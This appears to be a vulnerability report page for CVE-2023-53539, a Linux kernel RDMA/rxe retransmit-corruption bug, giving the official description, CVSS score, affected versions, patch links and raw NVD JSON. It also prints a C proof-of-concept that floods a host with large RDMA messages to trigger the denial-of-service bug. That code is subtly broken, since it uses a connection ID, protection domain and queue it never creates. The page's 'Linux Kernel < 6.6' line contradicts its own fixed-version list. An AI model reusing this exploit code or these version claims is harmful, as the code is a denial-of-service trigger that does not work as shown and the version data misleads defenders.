Security Vulnerability Report
CVE-2023-53539 CVSS 5.5 MEDIUM

CVE-2023-53539

Published: 2025-10-04 16:15:49
Last Modified: 2026-03-21 00:25:38
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

RDMA/rxe: Fix incomplete state save in rxe_requester

If a send packet is dropped by the IP layer in rxe_requester() the call to rxe_xmit_packet() can fail with err == -EAGAIN. To recover, the state of the wqe is restored to the state before the packet was sent so it can be resent. However, the routines that save and restore the state miss a significant part of the variable state in the wqe, the dma struct which is used to process through the sge table. And, the state is not saved before the packet is built which modifies the dma struct.

Under heavy stress testing with many QPs on a fast node sending large messages to a slow node dropped packets are observed and the resent packets are corrupted because the dma struct was not restored. This patch fixes this behavior and allows the test cases to succeed.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

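cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 4.8.1 inclusive, up to 6.1.53 exclusive) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.2 inclusive, up to 6.4.16 exclusive) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.5 inclusive, up to 6.5.3 exclusive) - VULNERABLE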
cpe:2.3:o:linux:linux_kernel:4.8:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:4.8:rc7:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.6 (all versions affected by the rxe_requester state-save defect)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2023-53539 PoC - Trigger corrupted retransmit in RDMA/rxe
// This PoC demonstrates how to trigger the vulnerability by creating
// multiple QPs and sending large messages to stress the rxe_requester
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <rdma/rdma_cma.h>
#include <rdma/rdma_verbs.h>
#include <infiniband/verbs.h>

#define NUM_QPS 64
#define MSG_SIZE (1024 * 1024) // 1MB large messages
#define SERVER_ADDR "192.168.1.100"
#define PORT 4791

struct rdma_resources {
    struct rdma_cm_id *cm_id;
    struct ibv_pd *pd;
    struct ibv_cq *cq;
    struct ibv_qp *qp;
    struct ibv_mr *mr;
    void *buf;
};

// Setup RDMA connection
static int setup_qp(struct rdma_resources *res)
{
    struct rdma_cm_event *event;
    struct rdma_conn_param conn_param = {};

    // Create event channel
    struct rdma_event_channel *ec = rdma_create_event_channel();
    if (!ec)
        return -1;

    // Resolve address
    struct addrinfo *addr;
    getaddrinfo(SERVER_ADDR, NULL, NULL, &addr);
    struct sockaddr_in *sin = (struct sockaddr_in *)addr->ai_addr;
    sin->sin_port = htons(PORT);
    rdma_resolve_addr(res->cm_id, NULL, (struct sockaddr *)sin, 2000);
    rdma_get_cm_event(ec, &event);
    rdma_ack_cm_event(event);

    // Create QP
    struct ibv_qp_init_attr qp_attr = {};
    qp_attr.qp_type = IBV_QPT_RC;
    qp_attr.send_cq = res->cq;
    qp_attr.recv_cq = res->cq;
    qp_attr.cap.max_send_wr = 10;
    qp_attr.cap.max_recv_wr = 10;
    qp_attr.cap.max_send_sge = 1;
    qp_attr.cap.max_recv_sge = 1;
    rdma_create_qp(res->cm_id, res->pd, &qp_attr);
    res->qp = res->cm_id->qp;

    // Register memory region
    res->buf = malloc(MSG_SIZE);
    memset(res->buf, 'A', MSG_SIZE);
    res->mr = rdma_reg_msgs(res->cm_id, res->buf, MSG_SIZE);

    return 0;
}

// Send large message to trigger packet drop and retransmit
static void stress_send(struct rdma_resources *res)
{
    struct ibv_sge sge;
    struct ibv_send_wr wr, *bad_wr;

    sge.addr = (uint64_t)res->buf;
    sge.length = MSG_SIZE;
    sge.lkey = res->mr->lkey;

    wr.sg_list = &sge;
    wr.num_sge = 1;
    wr.opcode = IBV_WR_SEND;
    wr.send_flags = IBV_SEND_SIGNALED;
    wr.next = NULL;

    // Send large message - may trigger IP layer drop
    ibv_post_send(res->qp, &wr, &bad_wr);
}

int main(int argc, char **argv)
{
    struct rdma_resources res[NUM_QPS];

    printf("CVE-2023-53539 PoC - RDMA/rxe state corruption\n");
    printf("Creating %d QPs and sending large messages...\n", NUM_QPS);

    // Setup multiple QPs to stress the rxe_requester
    for (int i = 0; i < NUM_QPS; i++) {
        if (setup_qp(&res[i]) < 0) {
            fprintf(stderr, "Failed to setup QP %d\n", i);
            continue;
        }
        // Send large messages concurrently
        stress_send(&res[i]);
    }

    printf("Stress test initiated. Check for corrupted retransmits.\n");
    sleep(30);

    return 0;
}

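References

https://git.kernel.org/stable/c/255c0e60e1d16874fc151358d94bc8df661600dd (Patch)
https://git.kernel.org/stable/c/2f2a6422287fe29f9343247d77b645100ece0652 (Patch)
https://git.kernel.org/stable/c/5d122db2ff80cd2aed4dcd630befb56b51ddf947 (Patch)
https://git.kernel.org/stable/c/70518f3aaf5a059b691867d7d2d46b999319656a (Patch)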

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53539", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:48.930", "lastModified": "2026-03-21T00:25:38.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/rxe: Fix incomplete state save in rxe_requester\n\nIf a send packet is dropped by the IP layer in rxe_requester()\nthe call to rxe_xmit_packet() can fail with err == -EAGAIN.\nTo recover, the state of the wqe is restored to the state before\nthe packet was sent so it can be resent. However, the routines\nthat save and restore the state miss a significnt part of the\nvariable state in the wqe, the dma struct which is used to process\nthrough the sge table. And, the state is not saved before the packet\nis built which modifies the dma struct.\n\nUnder heavy stress testing with many QPs on a fast node sending\nlarge messages to a slow node dropped packets are observed and\nthe resent packets are corrupted because the dma struct was not\nrestored. 
This patch fixes this behavior and allows the test cases\nto succeed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.8.1", "versionEndExcluding": "6.1.53", "matchCriteriaId": "E003B51F-578A-4752-8266-469759075467"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.16", "matchCriteriaId": "C3039EA3-F6CA-43EF-9F17-81A7EC6841EF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.5", "versionEndExcluding": "6.5.3", "matchCriteriaId": "880C803A-BEAE-4DA0-8A59-AC023F7B4EE3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:4.8:-:*:*:*:*:*:*", "matchCriteriaId": "2F396E56-2772-41B8-917F-0C38C2C1641C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:4.8:rc7:*:*:*:*:*:*", "matchCriteriaId": "EA3C1AC7-9D6A-4C5D-8EC9-6F634224E889"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:4.8:rc8:*:*:*:*:*:*", "matchCriteriaId": "3FCA9337-C4BE-41FA-841D-80FE81643EE2"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/255c0e60e1d16874fc151358d94bc8df661600dd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, 
{"url": "https://git.kernel.org/stable/c/2f2a6422287fe29f9343247d77b645100ece0652", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5d122db2ff80cd2aed4dcd630befb56b51ddf947", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/70518f3aaf5a059b691867d7d2d46b999319656a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}